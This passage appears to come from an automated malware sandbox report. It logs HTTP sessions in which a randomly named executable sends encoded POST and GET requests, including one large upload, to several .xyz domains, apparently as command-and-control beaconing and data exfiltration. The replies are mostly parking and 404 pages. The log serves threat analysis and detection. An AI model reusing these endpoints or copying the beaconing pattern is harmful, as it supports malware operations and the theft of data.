                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==
                  set-cookie: parking_session=81a2126a-1501-4e07-b5d7-19b0cb44ef59; expires=Sat, 14 Sep 2024 09:27:37 GMT; path=/
                  connection: close
                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                  Sep 14, 2024 11:12:37.821868896 CEST | 607 | IN
                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODFhMjEyNmEtMTUwMS00ZTA3LWI1ZDctMTliMGNiNDRlZjU5IiwicGFnZV90aW1lIjoxNzI2MzA1MT


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  20 | 192.168.2.4 | 49757 | 199.59.243.226 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:39.676362038 CEST | 520 | OUT | GET /wwak/?gd=E3TGpDthwwVtcd68e7GptjCB6e8kOO0p076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUcyNJNhtpQgsemRCiUIU53imXlsG7IfaIBm8=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.personal-loans-jp8.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:12:40.145515919 CEST | 1236 | IN | HTTP/1.1 200 OK
                  date: Sat, 14 Sep 2024 09:12:39 GMT
                  content-type: text/html; charset=utf-8
                  content-length: 1478
                  x-request-id: 9be63c29-bc53-40fa-a0e4-115a84173c2d
                  cache-control: no-store, max-age=0
                  accept-ch: sec-ch-prefers-color-scheme
                  critical-ch: sec-ch-prefers-color-scheme
                  vary: sec-ch-prefers-color-scheme
                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xzwwRlcqtnIywmh0RsYDEtl3hTxXxXs54SBAJojpYZ7TRSYT+g8jCrus5OE5434WVHauz09li8JU+BOYnwPmjg==
                  set-cookie: parking_session=9be63c29-bc53-40fa-a0e4-115a84173c2d; expires=Sat, 14 Sep 2024 09:27:40 GMT; path=/
                  connection: close
                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xzwwRlcqtnIywmh0RsYDEtl3hTxXxXs54SBAJojpYZ7TRSYT+g8jCrus5OE5434WVHauz09li8JU+BOYnwPmjg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                  Sep 14, 2024 11:12:40.145533085 CEST | 931 | IN
                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWJlNjNjMjktYmM1My00MGZhLWEwZTQtMTE1YTg0MTczYzJkIiwicGFnZV90aW1lIjoxNzI2MzA1MT


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  21 | 192.168.2.4 | 49758 | 162.0.239.141 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:45.226059914 CEST | 784 | OUT | POST /vnd3/ HTTP/1.1
                  Host: www.quantumnests.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.quantumnests.xyz
                  Referer: http://www.quantumnests.xyz/vnd3/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Ascii: gd=8apH6GvHlIgh8hoUG1ez189j6JllrvnMyHTNq5XDigZCVDKgnfcxFxCz3H3W72yKEQkY9bXk50Wi/yJCVq1fQ1hTo4RrC0pXDtfddhJEOPMBioBRmS+2QOd8+8m7S2sB1GzaY0xuYlkDNYnAzsrD/UmRTSuUXkoDc+WMr3F5ApdQ2amwgLY9Np2W1XAj+/km8w==
                  Sep 14, 2024 11:12:45.819773912 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Sat, 14 Sep 2024 09:12:45 GMT
                  Server: Apache
                  Content-Length: 18121
                  Connection: close
                  Content-Type: text/html
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  22 | 192.168.2.4 | 49759 | 162.0.239.141 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:47.771934032 CEST | 804 | OUT | POST /vnd3/ HTTP/1.1
                  Host: www.quantumnests.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.quantumnests.xyz
                  Referer: http://www.quantumnests.xyz/vnd3/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Ascii: gd=8apH6GvHlIgh9CwUASyzis9gm5llhPnIyHPNq4jqiztCUiWg1ucxGxCz8n2cmmyBEQ5t9evk50Ci/yZCUZdeQlhVhYR1fEpXDtfddlpuOPUBibJRnwG1O+dz/8m7YWsF1Gy/Y19XYmcDNdbAw4/EokmIcyvCfG9zY/300EtJfKdHzc3qx65qfpSloQJXz8Zvn1XDggDKyUTKe4DxAq1BsKM=
                  Sep 14, 2024 11:12:48.348790884 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Sat, 14 Sep 2024 09:12:48 GMT
                  Server: Apache
                  Content-Length: 18121
                  Connection: close
                  Content-Type: text/html
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  23 | 192.168.2.4 | 49760 | 162.0.239.141 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:50.321208954 CEST | 10886 | OUT | POST /vnd3/ HTTP/1.1
                  Host: www.quantumnests.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.quantumnests.xyz
                  Referer: http://www.quantumnests.xyz/vnd3/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Ascii: gd=8apH6GvHlIgh9CwUASyzis9gm5llhPnIyHPNq4jqiz1CVQegn9ExHxCz/n2fmmyQEQhp9fTS5xGi+UVCBYdealhVs4RoC0p4DszZdhNuOPUBidtRgi+1M+d8+8mnS2sh1GbCY15YYX8DN9rAxODEqEmKfyvKfGhsY/6N0FZwfNtHy5yDlbEydZK02QRP8e8jknTJvxfFgVfoYqz0YrcFwdEaY0tTmCptHCVnJeg3gzT1/00qfIaB+n6aD9p3SsJDExtLjcyM89LLEHYhVlrLuYinICqp/4nUWRAQM9kngxpf4mgajLGlFr6PzYnuSjbdtfxVTqHTqg43SU/9ndN5jKd1UcNGiChLTxgsS9YM4DV1q9XurgrobanSxWGrlJNTSIS5EOwoBsjtaRJmNr8pnFPf/EAyZbIyhVE4YkP8+XNpc44o9v+Rp6qLz9pnKjTYCxwoTp/DEQLqN71028JH4Gd1hzs5cARj3LeD5rjN2eqccJN5SrOYAx/b/KFH+VspJSyvKjnLVK9PdoiEwLTX7dLtXKDIEvNxLeZ3bZ4yHnSTftbMlT/GDrE93lOyAS/znUsflbV3mb54ZH7Uo6RNZ2bcadjscXmtrPkEbLNQUvEsbbRadh+0beDdqJwZkf9LWJzELiLoo3ThGP0NcL9O4BcfNyAPsd1ncAElc+sGGuAc/qD1RF02Opr02z2aP+ryzgjckOulRrHQAW/+PPFmo4uCCfNrbbP2JvJhdDM+1ENz2Wts15sTbGdrtokPhn/uqepAM8pxWbK3e9ncyqIHUcwCeP9YE02KjVNQ00SexDOiG5FOSlMac+QhWWZgCFwJ0oOKXPRSYM2vc6W1dogdHaXsRyHc14W4JuKt0JTw4r+mpz0xPklPrg1k8Iho3CL5rkLteFAglm0S7rHCVEiQm7U5kTZz/pp9NnmHymzUwrtxAa445BNk6C8Wl4yPP2b1l++hpAL5TvpF18hTV9HzlwU5scuJorhVmmgtpTShwYgmaC0q5 [TRUNCATED]
                  Sep 14, 2024 11:12:50.939414978 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Sat, 14 Sep 2024 09:12:50 GMT
                  Server: Apache
                  Content-Length: 18121
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                  Sep 14, 2024 11:12:50.939429998 CEST | 1236 | IN | Data Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                  Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                  Sep 14, 2024 11:12:50.939439058 CEST | 448 | IN | Data Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                  Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                  Sep 14, 2024 11:12:50.939448118 CEST | 1236 | IN | Data Raw: 22 73 74 32 22 20 64 3d 22 4d 32 37 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 38 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c
                  Data Ascii: "st2" d="M279.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M289.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M299.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M309.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M319.8
                  Sep 14, 2024 11:12:50.939457893 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64
                  Data Ascii: > <path class="st2" d="M499.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M1000 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M990 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M980 282.4h-3l-6.8 25.2h3z"/> <path class="s
                  Sep 14, 2024 11:12:50.939469099 CEST | 1236 | IN | Data Raw: 20 64 3d 22 4d 37 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 38 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32
                  Data Ascii: d="M790 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M780 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M770 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M760 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M750 282.4h-3l-6.8
                  Sep 14, 2024 11:12:50.939479113 CEST | 1236 | IN | Data Raw: 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 35 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 3c 70 61 74 68
                  Data Ascii: 2h3z"/> <path class="st2" d="M560 282.4h-3l-6.8 25.2h3z"/> <g> <path class="st2" d="M-490.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-480.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-470.2 282.4h-3l-6.8 25.
                  Sep 14, 2024 11:12:50.939496040 CEST | 328 | IN | Data Raw: 3d 22 4d 2d 33 30 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e
                  Data Ascii: ="M-300.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-290.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-280.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-270.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M
                  Sep 14, 2024 11:12:50.939506054 CEST | 1236 | IN | Data Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61
                  Data Ascii: h3z"/> <path class="st2" d="M-240.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-230.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z
                  Sep 14, 2024 11:12:50.939589977 CEST | 1236 | IN | Data Raw: 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f
                  Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-30.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-20.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-10.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-.2 282.4h-3l
                  Sep 14, 2024 11:12:50.944468021 CEST | 1236 | IN | Data Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 32 30 20 32
                  Data Ascii: ath class="st2" d="M330 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M320 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M310 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M300 282.4h-3l-6.8 25.2h3z"/> <path class="st2"


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  24 | 192.168.2.4 | 49761 | 162.0.239.141 | 80 | 3272 | C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 14, 2024 11:12:52.866863966 CEST | 514 | OUT | GET /vnd3/?gd=xYBn5zztkuVfiCwnPAPX5/Vc6KcZvMqR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERXhxrpvJyNz8FMq3GCQE2JNk4pLMM9VfXXZw=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.quantumnests.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:12:53.457520008 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Sat, 14 Sep 2024 09:12:53 GMT
                  Server: Apache
                  Content-Length: 18121
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                  Sep 14, 2024 11:12:53.457551956 CEST | 1236 | IN | Data Raw: 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20
                  Data Ascii: .2s54.7-28 117.5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d=
                  Sep 14, 2024 11:12:53.457582951 CEST | 1236 | IN | Data Raw: 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38
                  Data Ascii: class="st2" d="M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d=
